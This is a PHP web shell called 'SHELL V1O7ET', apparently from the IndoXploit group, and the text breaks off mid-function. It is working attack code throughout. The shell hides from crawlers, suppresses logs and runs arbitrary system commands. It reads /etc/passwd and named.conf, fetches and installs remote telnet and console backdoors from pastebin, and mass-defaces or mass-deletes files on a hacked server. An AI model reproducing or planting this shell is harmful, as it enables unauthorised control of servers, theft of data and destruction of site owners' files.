· 6 years ago · Oct 14, 2019, 06:04 AM
1<?php
2session_start();
3error_reporting(0);
4set_time_limit(0);
5@set_magic_quotes_runtime(0);
6@clearstatcache();
7@ini_set('error_log',NULL);
8@ini_set('log_errors',0);
9@ini_set('max_execution_time',0);
10@ini_set('output_buffering',0);
11@ini_set('display_errors', 0);
12
13$password = "c11807299e8ba167645c32f333dddbfd"; # md5: SopiyanTae
14
15$SERVERIP = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
16$FILEPATH = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());
17
18if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
20 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21 header('HTTP/1.0 404 Not Found');
22 exit;
23 }
24}
25
26function login_shell() {
27?>
28<!DOCTYPE HTML>
29<html>
30<head>
31<title>SHELL - V1O7ET</title>
32<style type="text/css">
33html {
34 margin: 20px auto;
35 background: #fff;
36 color: red;
37 text-align: center;
38}
39header {
40 color: blue;
41 margin: 10px auto;
42}
43input[type=password] {
44 width: 250px;
45 height: 25px;
46 color: red;
47 background: transparent;
48 border: 1px dotted red;
49 margin-left: 20px;
50 text-align: center;
51}
52</style>
53</head>
54<center>
55<header>
56<pre>
57 __ ___ ___ _____ _____ _____
58 \ \ / / |/ _ \___ | ____|_ _|
59 \ \ / /| | | | | / /| _| | |
60 \ V / | | |_| |/ / | |___ | |
61 \_/ |_|\___//_/ |_____| |_|
62
63 </pre>
64</header>
65<form method="post">
66<input type="password" name="password">
67</form>
68<?php
69exit;
70}
71
72if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
73 if(empty($password) || (isset($_POST['password']) && (md5($_POST['password']) == $password)))
74 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
75 else
76 login_shell();
77
78if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
79 @ob_clean();
80 $file = $_GET['file'];
81 header('Content-Description: File Transfer');
82 header('Content-Type: application/octet-stream');
83 header('Content-Disposition: attachment; filename="'.basename($file).'"');
84 header('Expires: 0');
85 header('Cache-Control: must-revalidate');
86 header('Pragma: public');
87 header('Content-Length: ' . filesize($file));
88 readfile($file);
89 exit;
90}
91
92if(get_magic_quotes_gpc()) {
93 function idx_ss($array) {
94 return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
95 }
96 $_POST = idx_ss($_POST);
97}
98?>
99<!DOCTYPE HTML>
100<html>
101<!--
102###############################################################################
103// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
104// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
105// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
106// Tanpa kalian kita tidak akan BESAR seperti sekarang.
107// Greetz: All Member IndoXploit. & All My Friends.
108###############################################################################
109// Special Thanks: Depok Cyber Security | Sanjungan Jiwa | 0x1999
110###############################################################################
111-->
112<head>
113<title>SHELL V1O7ET</title>
114<meta name='author' content='Santuy'>
115<meta charset="UTF-8">
116<style type='text/css'>
117@import url(https://fonts.googleapis.com/css?family=Ubuntu);
118html {
119 background: #000;
120 color: #6600FF;
121 font-size: 15px;
122 width: 100%;
123}
124
125li {
126 display: inline;
127 margin: 5px;
128 padding: 5px;
129}
130
131a {
132 color: #3333FF;
133 text-decoration: none;
134}
135
136a:hover {
137 color: red;
138 text-decoration: underline;
139}
140
141b {
142 color: red;
143}
144
145pre {
146 font-size: 13px;
147}
148
149table, th, td {
150 border-collapse:collapse;
151 background: transparent;
152 font-family: 'Ubuntu';
153 font-size: 13px;
154}
155
156.table_home, .th_home, .td_home {
157 border: 1px solid #6600FF;
158}
159
160.th_home {
161 color: red;
162}
163
164.td_home, .td_home > a {
165 color: #3333FF;
166}
167
168.td_home > a:hover {
169 color: red;
170}
171
172th {
173 padding: 10px;
174}
175
176tr:hover {
177 background: #fff;
178 color: #3333FF;
179}
180
181input[type=text], input[type=password], .input {
182 background: transparent;
183 color: #3333FF;
184 border: 1px solid #6600FF;
185 padding: 3px;
186 font-family: 'Ubuntu';
187 font-size: 13px;
188}
189
190input[type=submit] {
191 padding: 4px;}
192
193input[type=submit]:hover {
194 cursor: pointer;
195}
196
197input:focus, textarea:focus {
198 outline: 0;
199 border-color: #6600FF;
200}
201
202textarea {
203 border: 1px solid #6600FF;
204 width: 100%;
205 height: 400px;
206 padding-left: 5px;
207 margin: 10px auto;
208 resize: none;
209 background: transparent;
210 color: #3333FF;
211 font-family: 'Ubuntu';
212 font-size: 13px;
213}
214iframe {
215 width: 100%;
216 min-height: 500px;
217}
218</style>
219</head>
220<body>
221
222<?php
223function path() {
224 if(isset($_GET['dir'])) {
225 $dir = str_replace("\\", "/", $_GET['dir']);
226 @chdir($dir);
227 } else {
228 $dir = str_replace("\\", "/", getcwd());
229 }
230 return $dir;
231}
232
233function color($bold = 1, $colorid = null, $string = null) {
234 $color = array(
235 "</font>", # 0 off
236 "<font color='red'>", # 1 red
237 "<font color='lime'>", # 2 lime
238 "<font color='white'>", # 3 white
239 "<font color='gold'>", # 4 gold
240 );
241
242 return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
243}
244
245function OS() {
246 return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
247}
248
249function exe($cmd) {
250 if(function_exists('system')) {
251 @ob_start();
252 @system($cmd);
253 $buff = @ob_get_contents();
254 @ob_end_clean();
255 return $buff;
256 } elseif(function_exists('exec')) {
257 @exec($cmd,$results);
258 $buff = "";
259 foreach($results as $result) {
260 $buff .= $result;
261 } return $buff;
262 } elseif(function_exists('passthru')) {
263 @ob_start();
264 @passthru($cmd);
265 $buff = @ob_get_contents();
266 @ob_end_clean();
267 return $buff;
268 } elseif(function_exists('shell_exec')) {
269 $buff = @shell_exec($cmd);
270 return $buff;
271 }
272}
273
274function save($filename, $mode, $file) {
275 $handle = fopen($filename, $mode);
276 fwrite($handle, $file);
277 fclose($handle);
278 return;
279}
280
281function getfile($name) {
282 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
283 if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
284 elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
285 elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
286 elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
287
288 $fp = fopen($get[1], "w");
289 $ch = curl_init();
290 curl_setopt($ch, CURLOPT_URL, $get[0]);
291 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
292 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
293 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
294 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
295 curl_setopt($ch, CURLOPT_FILE, $fp);
296 return curl_exec($ch);
297 curl_close($ch);
298 fclose($fp);
299 ob_flush();
300 flush();
301}
302
303function usergroup() {
304 if(!function_exists('posix_getegid')) {
305 $user['name'] = @get_current_user();
306 $user['uid'] = @getmyuid();
307 $user['gid'] = @getmygid();
308 $user['group'] = "?";
309 } else {
310 $user['uid'] = @posix_getpwuid(posix_geteuid());
311 $user['gid'] = @posix_getgrgid(posix_getegid());
312 $user['name'] = $user['uid']['name'];
313 $user['uid'] = $user['uid']['uid'];
314 $user['group'] = $user['gid']['name'];
315 $user['gid'] = $user['gid']['gid'];
316 }
317 return (object) $user;
318}
319
320function getuser() {
321 $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
322 while($read = fgets($fopen)) {
323 preg_match_all('/(.*?):x:/', $read, $getuser);
324 $user[] = $getuser[1][0];
325 }
326 return $user;
327}
328
329function getdomainname() {
330 $fopen = fopen("/etc/named.conf", "r");
331 while($read = fgets($fopen)) {
332 preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
333 $domain[] = $getdomain[1][0];
334 }
335 return $domain;
336}
337
338function hddsize($size) {
339 if($size >= 1073741824)
340 return sprintf('%1.2f',$size / 1073741824 ).' GB';
341 elseif($size >= 1048576)
342 return sprintf('%1.2f',$size / 1048576 ) .' MB';
343 elseif($size >= 1024)
344 return sprintf('%1.2f',$size / 1024 ) .' KB';
345 else
346 return $size .' B';
347}
348
349function hdd() {
350 $hdd['size'] = hddsize(disk_total_space("/"));
351 $hdd['free'] = hddsize(disk_free_space("/"));
352 $hdd['used'] = $hdd['size'] - $hdd['free'];
353 return (object) $hdd;
354}
355
356function writeable($path, $perms) {
357 return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
358}
359
360function perms($path) {
361 $perms = fileperms($path);
362 if (($perms & 0xC000) == 0xC000) {
363 // Socket
364 $info = 's';
365 }
366 elseif (($perms & 0xA000) == 0xA000) {
367 // Symbolic Link
368 $info = 'l';
369 }
370 elseif (($perms & 0x8000) == 0x8000) {
371 // Regular
372 $info = '-';
373 }
374 elseif (($perms & 0x6000) == 0x6000) {
375 // Block special
376 $info = 'b';
377 }
378 elseif (($perms & 0x4000) == 0x4000) {
379 // Directory
380 $info = 'd';
381 }
382 elseif (($perms & 0x2000) == 0x2000) {
383 // Character special
384 $info = 'c';
385 }
386 elseif (($perms & 0x1000) == 0x1000) {
387 // FIFO pipe
388 $info = 'p';
389 }
390 else {
391 // Unknown
392 $info = 'u';
393 }
394 // Owner
395 $info .= (($perms & 0x0100) ? 'r' : '-');
396 $info .= (($perms & 0x0080) ? 'w' : '-');
397 $info .= (($perms & 0x0040) ?
398 (($perms & 0x0800) ? 's' : 'x' ) :
399 (($perms & 0x0800) ? 'S' : '-'));
400 // Group
401 $info .= (($perms & 0x0020) ? 'r' : '-');
402 $info .= (($perms & 0x0010) ? 'w' : '-');
403 $info .= (($perms & 0x0008) ?
404 (($perms & 0x0400) ? 's' : 'x' ) :
405 (($perms & 0x0400) ? 'S' : '-'));
406 // World
407 $info .= (($perms & 0x0004) ? 'r' : '-');
408 $info .= (($perms & 0x0002) ? 'w' : '-');
409 $info .= (($perms & 0x0001) ?
410 (($perms & 0x0200) ? 't' : 'x' ) :
411 (($perms & 0x0200) ? 'T' : '-'));
412
413 return $info;
414}
415
416function lib_installed() {
417 $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
418 $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
419 $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
420 $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
421 $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
422 return implode(" | ", $lib);
423}
424
425function pwd() {
426 $dir = explode("/", path());
427 foreach($dir as $key => $index) {
428 print "<a href='?dir=";
429 for($i = 0; $i <= $key; $i++) {
430 print $dir[$i];
431 if($i != $key) {
432 print "/";
433 }
434 }
435 print "'>$index</a>/";
436 }
437 print "<br>";
438 print (OS() === "Windows") ? windisk() : "";
439}
440
441function windisk() {
442 $letters = "";
443 $v = explode("\\", path());
444 $v = $v[0];
445 foreach(range("A", "Z") as $letter) {
446 $bool = $isdiskette = in_array($letter, array("A"));
447 if(!$bool) $bool = is_dir("$letter:\\");
448 if($bool) {
449 $letters .= "[ <a href='?dir=$letter:\\'".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">";
450 if($letter.":" != $v) {
451 $letters .= $letter;
452 }
453 else {
454 $letters .= color(1, 2, $letter);
455 }
456 $letters .= "</a> ]";
457 }
458 }
459 if(!empty($letters)) {
460 print "Detected Drives $letters<br>";
461 }
462 if(count($quicklaunch) > 0) {
463 foreach($quicklaunch as $item) {
464 $v = realpath(path(). "..");
465 if(empty($v)) {
466 $a = explode(DIRECTORY_SEPARATOR,path());
467 unset($a[count($a)-2]);
468 $v = join(DIRECTORY_SEPARATOR, $a);
469 }
470 print "<a href='".$item[1]."'>".$item[0]."</a>";
471 }
472 }
473}
474
475function serverinfo() {
476 $disable_functions = @ini_get('disable_functions');
477 $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
478
479 $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(8, 4, $_SERVER['REMOTE_ADDR']);
480 $output[] = "WEB SERVER : ".color(8, 4, $_SERVER['SERVER_SOFTWARE']);
481 $output[] = "SYSTEM : ".color(8, 4, php_uname());
482 $output[] = "USER / GROUP: ".color(8, 4, usergroup()->name)."(".color(8, 4 , usergroup()->uid).") / ".color(8, 4 , usergroup()->group)."(".color(8, 4 , usergroup()->gid).")";
483 $output[] = "HDD : ".color(8, 4, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(8, 4 , hdd()->free).")";
484 $output[] = "PHP VERSION : ".color(8, 4, @phpversion());
485 $output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "NYALA" ? color(8, 4, "NYALA") : color(8, 4, "MATI"));
486 $output[] = "DISABLE FUNC: $disable_functions";
487 $output[] = lib_installed();
488 $output[] = "Current Dir (".writeable(path(), perms(path())).") ";
489
490 print "<pre>";
491 print implode("<br>", $output);
492 pwd();
493 print "</pre>";
494
495}
496
497function curl($url, $post = false, $data = null) {
498 $ch = curl_init($url);
499 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
500 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
501 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
502 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
503 curl_setopt($ch, CURLOPT_TIMEOUT, 10);
504 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
505 if($post) {
506 curl_setopt($ch, CURLOPT_POST, true);
507 curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
508 }
509 $curl['exec'] = curl_exec($ch);
510 $curl['info'] = curl_getinfo($ch);
511
512 return [
513 "info" => $curl['info'],
514 "response" => $curl['exec']
515 ];
516
517 curl_close($ch);
518}
519
520function reverse() {
521 $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=")['response'];
522 $response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
523 $explode = explode(",,", $response);
524 unset($explode[0]);
525
526 foreach($explode as $domain) {
527 $domain = "http://$domain";
528 $domain = str_replace(",", "", $domain);
529 $url[] = $domain;
530 ob_flush();
531 flush();
532 }
533
534 return $url;
535}
536
537function getValue($param, $kata1, $kata2){
538 if(strpos($param, $kata1) === FALSE) return FALSE;
539 if(strpos($param, $kata2) === FALSE) return FALSE;
540 $start = strpos($param, $kata1) + strlen($kata1);
541 $end = strpos($param, $kata2, $start);
542 $return = substr($param, $start, $end - $start);
543 return $return;
544}
545
546function massdeface($dir, $file, $filename, $type = null) {
547 $scandir = scandir($dir);
548 foreach($scandir as $dir_) {
549 $path = "$dir/$dir_";
550 $location = "$path/$filename";
551 if($dir_ === "." || $dir_ === "..") {
552 file_put_contents($location, $file);
553 }
554 else {
555 if(is_dir($path) AND is_writable($path)) {
556 print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";
557 file_put_contents($location, $file);
558 if($type === "-alldir") {
559 massdeface($path, $file, $filename, "-alldir");
560 }
561 }
562 }
563 }
564}
565
566function massdelete($dir, $filename) {
567 $scandir = scandir($dir);
568 foreach($scandir as $dir_) {
569 $path = "$dir/$dir_";
570 $location = "$path/$filename";
571 if($dir_ === '.') {
572 if(file_exists("$dir/$filename")) {
573 unlink("$dir/$filename");
574 }
575 }
576 elseif($dir_ === '..') {
577 if(file_exists(dirname($dir)."/$filename")) {
578 unlink(dirname($dir)."/$filename");
579 }
580 }
581 else {
582 if(is_dir($path) AND is_writable($path)) {
583 if(file_exists($location)) {
584 print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";
585 unlink($location);
586 massdelete($path, $filename);
587 }
588 }
589 }
590 }
591}
592
593function tools($toolsname, $args = null) {
594 if($toolsname === "cmd") {
595 print "<form method='post' action='?do=cmd&dir=".path()."' style='margin-top: 15px;'>
596 ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
597 <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' name='cmd' required>
598 <input style='border: none; border-bottom: 1px solid #ffffff;' class='input' type='submit' value='>>'>
599 </form>";
600 }
601 elseif($toolsname === "readfile") {
602 if(empty($args)) die(color(1, 1, $msg));
603 if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));
604
605 print "<pre>";
606 print htmlspecialchars(file_get_contents($args));
607 print "</pre>";
608 }
609 elseif($toolsname === "spawn") {
610 if($args === "adminer") {
611 if(file_exists("adminer.php")) {
612 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
613 }
614 else {
615 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
616 if(getfile("adminer")) {
617 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
618 }
619 else {
620 print color(1, 1, "Error while downloading file Adminer.");
621 @unlink("adminer.php");
622 }
623 }
624 }
625 elseif($args === "webconsole") {
626 if(file_exists("webconsole.php")) {
627 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
628 }
629 else {
630 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
631 if(getfile("webconsole")) {
632 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
633 }
634 else {
635 print color(1, 1, "Error while downloading file WebConsole.");
636 @unlink("webconsole.php");
637 }
638 }
639 }
640 elseif($args === "cgitelnet1") {
641 if(file_exists("idx_cgi/cgitelnet1.idx")) {
642 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
643 }
644 elseif(file_exists('cgitelnet1.idx')) {
645 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
646 }
647 else {
648 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
649 if(!is_dir(path()."/idx_cgi/")) {
650 @mkdir('idx_cgi', 0755);
651 save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
652 }
653 if(getfile("cgitelnet1")) {
654 chmod('idx_cgi/cgitelnet1.idx', 0755);
655 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
656 }
657 else {
658 print color(1, 1, "Error while downloading file CGI Telnet.");
659 @rmdir(path()."/idx_cgi/");
660 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
661 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
662 }
663 }
664
665 }
666 elseif($args === "cgitelnet2") {
667 if(file_exists("idx_cgi/cgitelnet2.idx")) {
668 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
669 }
670 elseif(file_exists('cgitelnet2.idx')) {
671 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet2.idx' frameborder='0' scrolling='no'></iframe>";
672 }
673 else {
674 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
675 if(!is_dir(path()."/idx_cgi/")) {
676 @mkdir('idx_cgi', 0755);
677 save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
678 }
679 if(getfile("cgitelnet2")) {
680 chmod('idx_cgi/cgitelnet2.idx', 0755);
681 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
682 }
683 else {
684 print color(1, 1, "Error while downloading file CGI Telnet.");
685 @rmdir(path()."/idx_cgi/");
686 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
687 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
688 }
689 }
690
691 }
692 elseif($args === "phpinfo") {
693 if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
694 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
695 }
696 else {
697 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't creat